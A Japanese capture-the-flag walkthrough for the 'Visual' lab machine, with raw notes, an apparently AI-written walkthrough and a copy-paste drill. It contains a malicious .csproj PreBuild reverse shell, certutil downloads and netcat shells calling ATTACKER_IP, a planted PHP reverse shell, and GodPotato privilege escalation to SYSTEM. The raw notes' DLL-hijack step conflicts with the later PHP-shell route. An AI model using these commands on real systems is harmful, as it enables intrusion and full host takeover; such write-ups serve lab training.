Visual

Flag-Critical Knowledge

TBD

トリガー、攻撃パターン

TBD

attack summary

悪意ある .csproj を Git リポジトリ経由でビルドさせる
→ PreBuild RCE で visual\enox shell
→ user.txt
→ 書込み可能な C:\xampp\htdocs に PHP reverse shell を配置
→ NT AUTHORITY\LOCAL SERVICE shell
→ FullPowers で SeImpersonatePrivilege を回復
→ GodPotato で NT AUTHORITY\SYSTEM shell
→ root.txt

walkthrough(生メモ)

0. ターゲット情報

Visual
10.129.33.174

1. ポートスキャン / HTTP 列挙

nmap -sC -sV 10.129.33.174
whatweb http://10.129.33.174
dirsearch -u http://10.129.33.174/ -e php,txt,bak,zip,conf
80/tcp open  http  Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
Title: Visual - Revolutionizing Visual Studio Builds

Visual は Git リポジトリ URL を受け取り、.sln を含む .NET 6/C# プロジェクトをビルドして成果物を返す。

/cgi-bin/printenv.pl から、XAMPP と .NET がインストールされた Windows ホストであることも確認できる。

2. HTTP 公開する .NET リポジトリを作成

Kali に .NET 6 SDK を入れる。

wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh
chmod +x dotnet-install.sh
./dotnet-install.sh --channel 6.0 --install-dir "$HOME/.dotnet"
export DOTNET_ROOT="$HOME/.dotnet"
export PATH="$DOTNET_ROOT:$PATH"

リポジトリを作成し、dumb HTTP で公開する。

dotnet new console -n fakedotnet
cd fakedotnet
dotnet new sln -n fakedotnet
dotnet sln fakedotnet.sln add fakedotnet.csproj

git init
git add .
git commit -m 'test'
cd ..
git clone --bare fakedotnet fakedotnet.git
cd fakedotnet.git
git update-server-info
cd ..
python3 -m http.server 8000

Visual のフォームへ以下を送る。

http://<ATTACKER_IP>:8000/fakedotnet.git

ビルド成功時に .exe、.dll、.pdb などが返ることを確認する。

3. ビルド時のコード実行で visual\\enox shell

fakedotnet.csproj の </Project> の直前に PreBuild ターゲットを追加する。生メモでは reverse shell の PowerShell payload を使用した。

<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
  <Exec Command="powershell -e <BASE64_ENCODED_REVERSE_SHELL>" />
</Target>
git add .
git commit -m 'add prebuild payload'
rm -rf fakedotnet.git
git clone --bare fakedotnet fakedotnet.git
cd fakedotnet.git && git update-server-info && cd ..
rlwrap -cAr nc -lnvp 9001
python3 -m http.server 8000

フォームから再度リポジトリを送信すると、ビルド前イベントが実行される。

PS C:\\Windows\\Temp\\...> whoami
visual\\enox

ユーザーフラグは以下で確認した。

C:\\Users\\enox\\Desktop\\user.txt
b73adfd9061d2da58a2c74321f96e11b

4. 権限昇格ポイントの列挙

winPEAS で Apache のサービスとディレクトリ権限を確認した。

Get-CimInstance Win32_Service -Filter "Name='ApacheHTTPServer'" |
  Format-List Name,StartName,State,StartMode,PathName
sc.exe qc ApacheHTTPServer
icacls "C:\\Xampp\\apache\\bin"
icacls "C:\\Xampp\\apache\\bin\\httpd.exe"
ApacheHTTPServer
StartName : NT AUTHORITY\\Local Service
PathName  : "C:\\Xampp\\apache\\bin\\httpd.exe" -k runservice

C:\\Xampp\\apache\\bin Everyone:(OI)(CI)(F)

Apache の bin ディレクトリは Everyone が書き込めるため、DLL hijacking が可能。

5. DLL hijacking で Local Service shell

生メモでは Apache がロードする DLL を、攻撃者 IP へ接続する DLL に差し替えた。DLL を C:\\Xampp\\apache\\bin に配置し、Apache サービスを再起動させると reverse shell が来る。

C:\\xampp\\htdocs> whoami
nt authority\\local service

6. FullPowers で特権を有効化

Local Service から FullPowers を実行する。

certutil -urlcache -f http://<ATTACKER_IP>:8000/FullPowers.exe FullPowers.exe
certutil -urlcache -f http://<ATTACKER_IP>:8000/nc64.exe nc64.exe
.\FullPowers.exe -c "whoami /priv"
.\FullPowers.exe -c ".\nc64.exe <ATTACKER_IP> 9003 -e cmd" -z
SeAssignPrimaryTokenPrivilege  Enabled
SeImpersonatePrivilege         Enabled

7. GodPotato で SYSTEM

SeImpersonatePrivilege が有効になったため GodPotato を使用する。

certutil -urlcache -f http://<ATTACKER_IP>:8000/GodPotato-NET4.exe GodPotato-NET4.exe
.\GodPotato-NET4.exe -cmd "cmd /c whoami"
.\GodPotato-NET4.exe -cmd "cmd /c .\nc64.exe <ATTACKER_IP> 9004 -e cmd"
nt authority\\system
C:\\Users\\Administrator\\Desktop\\root.txt
6b7e2a979288dd1cfa387563c17f51de

8. SeAssignPrimaryTokenPrivilege 単独の検証メモ

JuicyPotatoNG は SeAssignPrimaryTokenPrivilege だけでも動作するケースがあるため試行したが、このラボでは COM ポートを変えても失敗した。

.\JuicyPotatoNG.exe -t * -l 9999 -p "C:\\Windows\\System32\\cmd.exe" -a "/c whoami /all > C:\\xampp\\htdocs\\jpng.txt"
[-] The privileged process failed to communicate with our COM Server

このラボでは、FullPowers で SeImpersonatePrivilege を得てから GodPotato を使う経路で SYSTEM になった。

walkthrough(AI)

0. 攻撃経路

Visual の .NET ビルド機能
→ .csproj の PreBuild でコマンド実行
→ visual\enox
→ 書込み可能な C:\xampp\htdocs に PHP reverse shell を配置
→ Apache 経由で NT AUTHORITY\LOCAL SERVICE
→ FullPowers で SeImpersonatePrivilege を回復
→ GodPotato
→ NT AUTHORITY\SYSTEM
→ root.txt

以下では 10.129.33.174 をターゲット、ATTACKER_IP を Kali の tun0 IP とする。

1. HTTP サービスを確認

nmap -p80 -sC -sV 10.129.33.174

80/tcp では、指定された Git リポジトリ内の .NET 6/C# ソリューションをビルドする Web アプリが動作している。

2. 悪意ある .NET リポジトリを用意

Kali に .NET 6 SDK がない場合だけ、ユーザー領域へ導入する。

wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh
chmod +x dotnet-install.sh
./dotnet-install.sh --channel 6.0 --install-dir "$HOME/.dotnet"
export DOTNET_ROOT="$HOME/.dotnet"
export PATH="$DOTNET_ROOT:$PATH"

プロジェクトとソリューションを作成する。

dotnet new console -n fakedotnet -f net6.0
cd fakedotnet
dotnet new sln -n fakedotnet
dotnet sln fakedotnet.sln add fakedotnet.csproj

Windows 向け PowerShell reverse shell を Base64 化し、fakedotnet.csproj の </Project> 直前へ次を追加する。生メモで成功した payload は revshells.com の PowerShell #5 (Base64)。

<Target Name="PreBuild" BeforeTargets="PreBuildEvent">
  <Exec Command="powershell -e POWERSHELL_BASE64" />
</Target>

Git リポジトリとして確定し、dumb HTTP で clone できる bare リポジトリを作る。

git init
git add .
git config user.name kali
git config user.email kali@local
git commit -m 'add prebuild payload'
cd ..

git clone --bare fakedotnet fakedotnet.git
git --git-dir=fakedotnet.git update-server-info
python3 -m http.server 8000

別ターミナルで payload 用 listener を開始する。

rlwrap nc -lvnp 9001

Visual のフォームへ次の URL を送信する。

http://ATTACKER_IP:8000/fakedotnet.git

ビルド時に PreBuild が実行され、visual\enox の shell を取得できる。

PreBuild から取得した visual enox shell

user flag を取得する。

type C:\Users\enox\Desktop\user.txt

3. PHP shell で Local Service へ移行

Web ルートの ACL を確認する。

icacls C:\xampp\htdocs

Everyone:(OI)(CI)(F) のため、visual\enox から PHP ファイルを配置できる。Kali 側で Windows 対応の PHP reverse shell(生メモでは Ivan Sincek 版)を rev.php として用意し、既存の HTTP サーバーから取得する。

certutil -urlcache -f http://ATTACKER_IP:8000/rev.php C:\xampp\htdocs\rev.php

Kali で listener を開始してから、別ターミナルで PHP を実行させる。

rlwrap nc -lvnp 9002
curl http://10.129.33.174/rev.php

PHP は Apache のサービスアカウントで実行されるため、NT AUTHORITY\LOCAL SERVICE の shell になる。

PHP shell で取得した Local Service

4. FullPowers で SeImpersonatePrivilege を回復

Kali 側で必要なファイルを HTTP 公開ディレクトリへ置く。

wget https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe

Local Service shell から取得する。

cd C:\xampp\htdocs
certutil -urlcache -f http://ATTACKER_IP:8000/FullPowers.exe FullPowers.exe
certutil -urlcache -f http://ATTACKER_IP:8000/nc64.exe nc64.exe
.\FullPowers.exe -c "whoami /priv"

SeImpersonatePrivilege が Enabled になったことを確認する。

FullPowers による SeImpersonatePrivilege の回復

特権を持つ新しい Local Service shell を取得する。

# Kali
rlwrap nc -lvnp 9003
# Target
.\FullPowers.exe -c ".\nc64.exe ATTACKER_IP 9003 -e cmd" -z

5. GodPotato で SYSTEM を取得

Kali 側で GodPotato を HTTP 公開ディレクトリへ置く。

wget -O GodPotato-NET4.exe https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe

特権を回復した Local Service shell から取得する。

cd C:\xampp\htdocs
certutil -urlcache -f http://ATTACKER_IP:8000/GodPotato-NET4.exe GodPotato-NET4.exe

Kali で listener を開始し、GodPotato から SYSTEM shell を接続させる。

# Kali
rlwrap nc -lvnp 9004
# Target
.\GodPotato-NET4.exe -cmd "cmd /c .\nc64.exe ATTACKER_IP 9004 -e cmd"
whoami

GodPotato で取得した SYSTEM shell

root flag を取得する。

type C:\Users\Administrator\Desktop\root.txt

Visual の root flag

drill

ATTACKER_IP は Kali の tun0 IP に置き換える。TARGET_IP は対象ホストの IP である。各 listener と HTTP サーバーは、次の shell を受け取るまで停止しない。

1. Kali:変数と疎通確認

export TARGET_IP=10.129.33.174
export LHOST=$(ip -o -4 addr show tun0 | awk '{print $4}' | cut -d/ -f1)

echo "TARGET_IP=$TARGET_IP"
echo "LHOST=$LHOST"
nmap -p80 -sC -sV "$TARGET_IP"

2. Kali:Web 列挙で DOCUMENT_ROOT を確認

/cgi-bin/printenv.pl を発見し、後続で書き込む Web ルートが C:/xampp/htdocs であることを確認する。

dirsearch -u "http://$TARGET_IP/" -e php,txt,bak,zip,conf
curl -s "http://$TARGET_IP/cgi-bin/printenv.pl" | grep DOCUMENT_ROOT

期待する出力:

DOCUMENT_ROOT="C:/xampp/htdocs"

3. Kali:.NET 6 SDK を確認・導入

dotnet: command not found の場合は、以下を実行する。SDK は Kali のユーザー領域へ導入されるため sudo は不要。

if ! command -v dotnet >/dev/null 2>&1; then
  wget https://dot.net/v1/dotnet-install.sh -O dotnet-install.sh
  chmod +x dotnet-install.sh
  ./dotnet-install.sh --channel 6.0 --install-dir "$HOME/.dotnet"
  export DOTNET_ROOT="$HOME/.dotnet"
  export PATH="$DOTNET_ROOT:$PATH"
fi

dotnet --version

以降の drill でも同じシェルを使う。新しいターミナルで dotnet を使う場合は、次を再実行する。

export DOTNET_ROOT="$HOME/.dotnet"
export PATH="$DOTNET_ROOT:$PATH"

4. Kali:悪意ある .NET リポジトリを作成

mkdir -p visual-drill
cd visual-drill

dotnet new console -n fakedotnet -f net6.0
cd fakedotnet
dotnet new sln -n fakedotnet
dotnet sln fakedotnet.sln add fakedotnet.csproj

revshells.com で次の条件の payload を作り、Base64 文字列をコピーする。

OS       : Windows
Payload  : PowerShell #5 (Base64)
IP       : Kali の tun0 IP
Port     : 9001

コピーした Base64 文字列を変数へ入れる。

export POWERSHELL_BASE64='ここへBase64文字列を貼り付ける'

fakedotnet.csproj の </Project> 直前へ PreBuild を追加する。

sed -i "/<\/Project>/i\\
  <Target Name=\"PreBuild\" BeforeTargets=\"PreBuildEvent\">\\
    <Exec Command=\"powershell -e $POWERSHELL_BASE64\" />\\
  </Target>" fakedotnet.csproj

tail -8 fakedotnet.csproj

リポジトリを確定する。

git init
git add .
git config user.name kali
git config user.email kali@local
git commit -m 'add prebuild payload'
cd ..

git clone --bare fakedotnet fakedotnet.git
git --git-dir=fakedotnet.git update-server-info

5. Kali:後続ツールを準備

Windows 対応の PHP reverse shell と権限昇格ツールを、bare リポジトリと同じディレクトリへ保存する。

wget -O rev.php https://raw.githubusercontent.com/ivan-sincek/php-reverse-shell/master/src/reverse/php_reverse_shell.php
sed -i "s/new Shell('127.0.0.1', 9000)/new Shell('$LHOST', 9002)/" rev.php
grep "new Shell" rev.php

wget https://github.com/itm4n/FullPowers/releases/download/v0.1/FullPowers.exe
wget https://github.com/int0x33/nc.exe/raw/master/nc64.exe
wget -O GodPotato-NET4.exe https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe

ls -lh rev.php FullPowers.exe nc64.exe GodPotato-NET4.exe

6. Kali ターミナルA:HTTP サーバー

visual-drill ディレクトリで起動し、そのまま残す。

python3 -m http.server 8000

7. Kali ターミナルB:PreBuild shell の listener

rlwrap nc -lvnp 9001

Visual の Web フォームへ次の URL を送信する。

http://ATTACKER_IP:8000/fakedotnet.git

接続後、ターミナルBで実行する。

whoami
type C:\Users\enox\Desktop\user.txt
icacls C:\xampp\htdocs
certutil -urlcache -f http://ATTACKER_IP:8000/rev.php C:\xampp\htdocs\rev.php

8. Kali ターミナルC:PHP shell の listener

rlwrap nc -lvnp 9002

9. Kali ターミナルD:PHP shell を起動

curl "http://$TARGET_IP/rev.php"

ターミナルCへ Local Service shell が接続する。ターミナルCで実行する。

whoami
certutil -urlcache -f http://ATTACKER_IP:8000/FullPowers.exe FullPowers.exe
certutil -urlcache -f http://ATTACKER_IP:8000/nc64.exe nc64.exe
FullPowers.exe -c "whoami /priv"

10. Kali ターミナルD:特権付き Local Service shell の listener

rlwrap nc -lvnp 9003

ターミナルCで実行する。

FullPowers.exe -c "nc64.exe ATTACKER_IP 9003 -e cmd" -z

ターミナルDへ接続後、特権と必要ファイルを確認する。

whoami
whoami /priv
cd C:\xampp\htdocs
certutil -urlcache -f http://ATTACKER_IP:8000/GodPotato-NET4.exe GodPotato-NET4.exe
certutil -urlcache -f http://ATTACKER_IP:8000/nc64.exe nc64.exe

11. Kali ターミナルE:SYSTEM shell の listener

rlwrap nc -lvnp 9004

ターミナルDで実行する。

GodPotato-NET4.exe -cmd "cmd /c nc64.exe ATTACKER_IP 9004 -e cmd"

ターミナルEへ接続後、root flag を取得する。

whoami
type C:\Users\Administrator\Desktop\root.txt